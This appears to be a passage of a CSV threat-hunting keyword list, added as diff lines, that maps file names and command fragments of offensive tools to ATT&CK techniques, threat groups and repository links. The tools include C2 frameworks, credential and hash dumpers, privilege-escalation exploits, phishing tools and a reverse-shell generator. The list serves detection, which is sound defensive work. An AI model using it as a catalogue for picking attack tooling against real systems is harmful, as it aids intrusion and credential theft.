+"*mssqlattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z"
+"*mssqlattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*mssqlproxy-master*","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","7","682","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z"
+"*mssqlrelayclient.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*mssqlrelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z"
+"*mssqlsvc.kirbi*","offensive_tool_keyword","AD exploitation cheat sheet","Crack with TGSRepCrack","T1110","TA0006","N/A","N/A","Credential 
Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*mthbernardes*rsg*","offensive_tool_keyword","rsg","A tool to generate various ways to do a reverse shell","T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007","TA0002 - TA0011 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/mthbernardes/rsg","1","1","N/A","N/A","6","541","133","2023-04-27T10:32:21Z","2017-12-12T02:57:07Z"
+"*mttaggart/OffensiveNotion*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z"
+"*multi_meter_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*multi_vendor_cctv_dvr_pass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*multibit2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*MultiPotato.cpp*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z"
+"*MultiPotato.exe*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z"
+"*MultiPotato-main*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z"
+"*--mutator N*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z"
+"*mutator.py 
*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z"
+"*mvelazc0/BadZure*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","1","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z"
+"*mwrlabs*","offensive_tool_keyword","Github Username","used to be a malware repo aso hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/mwrlabs","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*-my.sharepoint.com/personal/Fakeuser*","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","5","490","73","2023-09-21T06:52:07Z","2019-03-05T08:54:38Z"
+"*-my.sharepoint.com/personal/TESTUSER_*","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","5","490","73","2023-09-21T06:52:07Z","2019-03-05T08:54:38Z"
+"*my_dump_my_pe*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z"
+"*myreallycooltotallyrealtenant.onmicrosoft.com*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z"
+"*myseatbelt.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z"
+"*mysql -u* -p c2 < c2_sample.sql*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z"
+"*mysql_authbypass_hashdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*mysql_file_enum.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*mysql_hashdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*mysql-privesc-race.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*Mystikal-main*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z"
+"*mythic_c2_container*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*mythic_nginx*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" 
+"*mythic_payloadtype*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*mythic_payloadtype*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*mythic_payloadtype_container*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*mythic_rest.Payload*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*mythic_service.py*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - 
T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*mythic_translator_containter*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*MythicAgents/Apollo*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z"
+"*MythicAgents/Athena*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*MythicAgents/merlin*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*MythicAgents/tetanus*","offensive_tool_keyword","tetanus","Mythic C2 agent targeting Linux and Windows hosts written in Rust","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://github.com/MythicAgents/tetanus","1","1","N/A","N/A","3","229","33","2023-05-14T21:34:20Z","2022-03-07T20:35:33Z" +"*mythic-cli *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*mythic-cli*athena*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*MythicClient.cs*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*mythic-docker*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*MzHmO/DebugAmsi*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" +"*MzHmO/Privileger*","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","117","25","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" +"*MzHmO/TGSThief*","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just 
present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","9","2","129","18","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" +"*n00py/LAPSDumper*","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","1","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" +"*n00py/Slackor*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*n0de.exe*elevationstation*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*n1k7l4i/goMatrixC2*","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","10","0","2","2023-09-11T10:20:41Z","2023-08-31T09:36:38Z" +"*n1k7l4i/goZulipC2*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z" +"*n1nj4sec*","offensive_tool_keyword","Github Username","Github username hosting exploitation 
tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/n1nj4sec","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*nabbmpekekjknlbkgpodfndbodhijjem*","greyware_tool_keyword","Earth VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*nac_bypass*","offensive_tool_keyword","nac_bypass","nac bypass - The basic requirement for an NAC bypass is access to a device that has already been authenticated. This device is used to log into the network and then smuggle in network packages from a different device. This involves placing the attackers system between the network switch and the authenticated device. One way to do this is with a Raspberry Pi and two network adapters","T1550.002 - T1078 - T1133 - T1040 - T1550","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Defense Evasion","https://github.com/scipag/nac_bypass","1","1","N/A","N/A","3","229","62","2023-08-02T09:09:19Z","2019-01-03T06:55:00Z" +"*nagios-root-privesc.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*--name chisel -p *","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*name=*Domain Admins*","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators 
for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*named_pipes.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
